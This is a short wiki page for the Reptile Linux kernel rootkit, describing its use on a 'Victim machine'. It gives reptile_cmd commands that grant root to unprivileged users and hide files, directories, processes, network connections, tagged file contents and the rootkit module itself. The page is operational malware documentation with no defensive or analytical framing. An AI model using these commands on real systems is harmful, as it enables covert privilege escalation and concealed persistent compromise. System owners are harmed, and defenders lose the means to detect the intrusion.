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Local Usage

Ighor Augusto edited this page Mar 2, 2020 · 1 revision

This Usage refers to a local usage to be done in Victim machine

Give root to unprivileged users

To get root privileges just type: /reptile/reptile_cmd root

Hide files, directories and kernel module

All files and folders that has reptile in the name will be hidden. You can configure this before the installation. The following commands hide/unhide files, folders, processes and the kernel module itself.

To hide: /reptile/reptile_cmd hide
To unhide: /reptile/reptile_cmd show

Hide processes

To hide processes: /reptile/reptile_cmd hide <pid>
To unhide processes: /reptile/reptile_cmd show <pid>

Hide TCP and UDP connections

Hide: /reptile/reptile_cmd conn <IP> hide
Unhide: /reptile/reptile_cmd conn <IP> show

Note: By default, TCP and UDP hiding feature are hiding all connections to an IP and disregarding PORT. If you really want to hide specific connections considering PORT, go to the code and see some comments in Connectoin hooks.

File content tampering

All content between tags will be hidden:

content to hide 

You can configure these tags in installation script.


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